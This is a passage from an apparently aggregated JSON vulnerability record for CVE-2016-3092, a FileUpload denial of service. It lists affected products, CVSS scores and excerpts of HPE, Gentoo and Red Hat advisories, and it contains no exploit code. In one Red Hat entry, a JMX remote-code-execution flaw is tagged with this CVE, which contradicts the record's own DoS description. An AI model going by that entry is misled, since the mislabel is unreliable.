"model": "commons fileupload",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "1.3"
},
{
"model": "infosphere metadata workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "case manager",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.11"
},
{
"model": "infosphere information server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.5.1"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.2.4.1102"
},
{
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.2"
},
{
"model": "jg747aae hp imc std sw plat w/ nodes e-ltu",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "500"
},
{
"model": "jg548aae hp pcm+ to imc bsc upgr w/50-node e-ltu",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "tomcat 9.0.0.m3",
"scope": null,
"trust": 0.3,
"vendor": "apache",
"version": null
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.3.7856"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.7"
},
{
"model": "spectrum control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.9"
},
{
"model": "sterling secure proxy ifix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.4.2.05"
},
{
"model": "tivoli storage manager for virtual environments",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.4"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.6.0.0"
},
{
"model": "tomcat 9.0.0.m5",
"scope": null,
"trust": 0.3,
"vendor": "apache",
"version": null
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.5"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.5.2.1"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.1.0"
},
{
"model": "bluemix liberty for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.5"
},
{
"model": "tomcat rc10",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "8.0.0"
},
{
"model": "infosphere information server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.03"
},
{
"model": "tivoli storage manager for virtual environments",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.10"
},
{
"model": "tivoli enterprise portal server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "global retention policy and schedule management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.3.3"
},
{
"model": "tomcat",
"scope": "ne",
"trust": 0.3,
"vendor": "apache",
"version": "8.0.36"
},
{
"model": "control center ifix04",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.0.1"
},
{
"model": "web experience factory",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.03"
},
{
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.5.1.3"
},
{
"model": "case manager",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.1"
},
{
"model": "forms server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.1"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.3.0.1098"
},
{
"model": "bluemix liberty for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.3"
},
{
"model": "jg767aae hp imc smcnct wsm vrtl applnc sw e-ltu",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.1"
},
{
"model": "infosphere information governance catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "11.3"
},
{
"model": "tomcat for hp-ux b.11.31",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.0.70.01"
},
{
"model": "tomcat rc2",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "8.0.0"
},
{
"model": "web experience factory",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.0.0"
},
{
"model": "jg590aae hp imc bsc wlan mgr sw pltfm ap e-ltu",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "500"
},
{
"model": "case manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.1.0"
},
{
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.2.5"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.4"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.1"
},
{
"model": "jf288aae hp network director to intelligent management center",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "jg766aae hp imc smcnct vrtl applnc sw e-ltu",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "jd126a hp imc ent s/w platform w/100-node",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "icewall sso password reset option",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "10.0"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.5.2.2"
},
{
"model": "support assistant team server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0.2.2"
},
{
"model": "i",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"model": "tomcat",
"scope": "ne",
"trust": 0.3,
"vendor": "apache",
"version": "8.5.3"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.18"
},
{
"model": "tomcat 9.0.0.m4",
"scope": null,
"trust": 0.3,
"vendor": "apache",
"version": null
},
{
"model": "forms server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.4.1"
},
{
"model": "infosphere information server business glossary",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "11.5"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.35"
},
{
"model": "cognos business intelligence server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0.0.0"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"model": "control center ifix02",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.0.0"
},
{
"model": "jf377a hp imc std s/w platform w/100-node lic",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.5"
},
{
"model": "b2b advanced communications",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.0.3"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0"
},
{
"model": "communications service broker engineered system edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.1"
},
{
"model": "websphere application server liberty profile",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "commons fileupload",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "1.2"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "commons fileupload",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "1.3.1"
},
{
"model": "websphere lombardi edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.5"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.2.0"
},
{
"model": "i",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.3"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.1"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.46"
},
{
"model": "tomcat rc1",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "8.0.0"
},
{
"model": "control center 6.0.0.0ifix03",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "infosphere metadata asset manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.7"
},
{
"model": "sterling secure proxy",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.4.3"
},
{
"model": "security guardium data redaction",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.5.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.24"
},
{
"model": "sterling secure proxy ifix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.4.3.01"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.18"
},
{
"model": "infosphere qualitystage",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "11.5"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.13"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.1"
},
{
"model": "jf377aae hp imc std s/w pltfrm w/100-node e-ltu",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "b2b advanced communications",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.0.4"
},
{
"model": "control center 6.1.0.0ifix01",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.021"
},
{
"model": "infosphere metadata workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.7"
},
{
"model": "algo one algo risk application",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.9"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.0"
},
{
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2.0.0"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6"
},
{
"model": "integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.0"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "infosphere information server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.7"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.0"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.6"
},
{
"model": "mysql enterprise backup",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.0.1"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.7"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.33"
},
{
"model": "control center ifix03",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.0.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.34"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.5.1"
},
{
"model": "infosphere business glossary",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.010"
}
],
"sources": [
{
"db": "BID",
"id": "91453"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-000121"
},
{
"db": "NVD",
"id": "CVE-2016-3092"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:apache:struts",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:apache:tomcat",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:apache:commons_fileupload",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-000121"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "139166"
},
{
"db": "PACKETSTORM",
"id": "139162"
},
{
"db": "PACKETSTORM",
"id": "141513"
},
{
"db": "PACKETSTORM",
"id": "139165"
},
{
"db": "PACKETSTORM",
"id": "139536"
},
{
"db": "PACKETSTORM",
"id": "139771"
},
{
"db": "PACKETSTORM",
"id": "139163"
}
],
"trust": 0.7
},
"cve": "CVE-2016-3092",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2016-3092",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "IPA",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2016-000121",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2016-3092",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "IPA",
"availabilityImpact": "Low",
"baseScore": 5.3,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2016-000121",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-3092",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "IPA",
"id": "JVNDB-2016-000121",
"trust": 0.8,
"value": "Medium"
},
{
"author": "VULMON",
"id": "CVE-2016-3092",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-3092"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-000121"
},
{
"db": "NVD",
"id": "CVE-2016-3092"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The MultipartStream class in Apache Commons Fileupload before 1.3.2, as used in Apache Tomcat 7.x before 7.0.70, 8.x before 8.0.36, 8.5.x before 8.5.3, and 9.x before 9.0.0.M7 and other products, allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string. Apache Commons FileUpload provided by the Apache Software Foundation contains a flaw when processing multi-part requests, which may lead to a denial-of-service (DoS). TERASOLUNA FW(Struts1) Team of NTT DATA Corporation reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.Processing a specially crafted request may result in the server\u0027s CPU resources to be exhausted. Apache Commons FileUpload is prone to a remote denial-of-service vulnerability. \nAttackers can exploit this issue to cause the application to become unresponsive; resulting in a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324759\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05324759\nVersion: 2\n\nHPSBUX03665 rev.2 - HP-UX Tomcat-based Servlet Engine, Remote Denial of\nService (DoS) and URL Redirection\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-11-09\nLast Updated: 2016-11-08\n\nPotential Security Impact: Remote: Denial of Service (DoS), URL Redirection\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified in the HP-UX\nTomcat-based Servlet Engine. These vulnerabilities could be exploited\nremotely to create a Denial of Service (DoS) and URL Redirection. \n\nReferences:\n\n - PSRT110272\n - CVE-2016-3092 - Remote denial of Service (DoS)\n - CVE-2016-5388 - Remote URL Redirection\n - PSRT110255\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - HP-UX Tomcat-based Servlet v.7.x Engine B.11.31 - Tomcat 7 prior to\nD.7.0.70.01\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2016-3092\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)\n\n CVE-2016-5388\n 8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has provided the following software update to resolve the vulnerabilities\nin HP-UX Apache Tomcat 7 Servlet Engine:\n\n * Tomcat 7.0.70.01 for HP-UX Release B.11.31 (IPF and PA-RISC)\n\n + 64 bit Depot: HP_UX_11.31_HPUXWS24ATW-B501-11-31-64.depot\n + 32 bit Depot: HP_UX_11.31_HPUXWS24ATW-B501-11-31-32.depot\n\n* **Note:** The depot file can be found here:\n\n +\n\u003chttps://h20392.www2.hpe.com/portal/swdepot/displayProductInfo.do?productNumb\nr=HPUXWSATW501\u003e\n\n**MANUAL ACTIONS: Yes - Update**\n \nDownload and install the software update\n\n**PRODUCT SPECIFIC INFORMATION**\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HPE and lists recommended actions that may apply to a specific\nHP-UX system. It can also download patches and create a depot automatically. \nFor more information see:\n \n *\n\u003chttps://h20392.www2.hpe.com/portal/swdepot/displayProductInfo.do?productNumb\nr=B6834AA\u003e\n\nThe following text is for use by the HP-UX Software Assistant. \n\n AFFECTED VERSIONS\n\n HP-UX B.11.31 IA/PA\n =================== \n hpuxws22TOMCAT.TOMCAT\n hpuxws22TOMCAT.TOMCAT2\n action: install revision D.7.0.70.01 or subsequent\n\n END AFFECTED VERSIONS\n\nHISTORY\n\nVersion:1 (rev.1) - 4 November 2016 Initial release\n\nVersion:2 (rev.2) - 8 November 2016 Removed extraneous text from background\nsection\n\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201705-09\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: Apache Tomcat: Multiple vulnerabilities\n Date: May 18, 2017\n Bugs: #575796, #586966, #595978, #615868\n ID: 201705-09\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Apache Tomcat, the worst of\nwhich could lead to privilege escalation. Please review\nthe CVE identifiers referenced below for details. \n\nA local attacker, who is a tomcat\u0027s system user or belongs to tomcat=E2=80=\n=99s\ngroup, could potentially escalate privileges. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Apache Tomcat users have to manually check their Tomcat runscripts\nto make sure that they don\u0027t use an old, vulnerable runscript. In\naddition:\n\nAll Apache Tomcat 7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=www-servers/tomcat-7.0.70:7\"\n\nAll Apache Tomcat 8 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=www-servers/tomcat-8.0.36:8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-5174\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5174\n[ 2 ] CVE-2015-5345\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5345\n[ 3 ] CVE-2015-5346\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5346\n[ 4 ] CVE-2015-5351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5351\n[ 5 ] CVE-2016-0706\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0706\n[ 6 ] CVE-2016-0714\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0714\n[ 7 ] CVE-2016-0763\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0763\n[ 8 ] CVE-2016-1240\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1240\n[ 9 ] CVE-2016-3092\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3092\n[ 10 ] CVE-2016-8745\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8745\n[ 11 ] CVE-2017-5647\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5647\n[ 12 ] CVE-2017-5648\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5648\n[ 13 ] CVE-2017-5650\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5650\n[ 14 ] CVE-2017-5651\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5651\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201705-09\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2017 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n--SKKBd9VlC8wusCVbXKC9aaUtloHAjIa1g--\n\n. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. \n\nSecurity Fix(es):\n\n* It was reported that the Tomcat init script performed unsafe file\nhandling, which could result in local privilege escalation. (CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain\nconfiguration files read by the Tomcat initialization script as writeable\nto the tomcat group. \n(CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of\nOracle\u0027s fix for CVE-2016-3427. JMXRemoteLifecycleListener is only included\nin EWS 2.x and JWS 3.x source distributions. If you deploy a Tomcat\ninstance built from source, using the EWS 2.x, or JWS 3.x distributions, an\nattacker could use this flaw to launch a remote code execution attack on\nyour deployed instance. (CVE-2016-3092)\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction with\na proxy that also permitted the invalid characters but with a different\ninterpretation, to inject data into the HTTP response. By manipulating the\nHTTP response the attacker could poison a web-cache, perform an XSS attack,\nor obtain sensitive information from requests other then their own. \n(CVE-2016-6816)\n\n* A bug was discovered in the error handling of the send file code for the\nNIO HTTP connector. This led to the current Processor object being added to\nthe 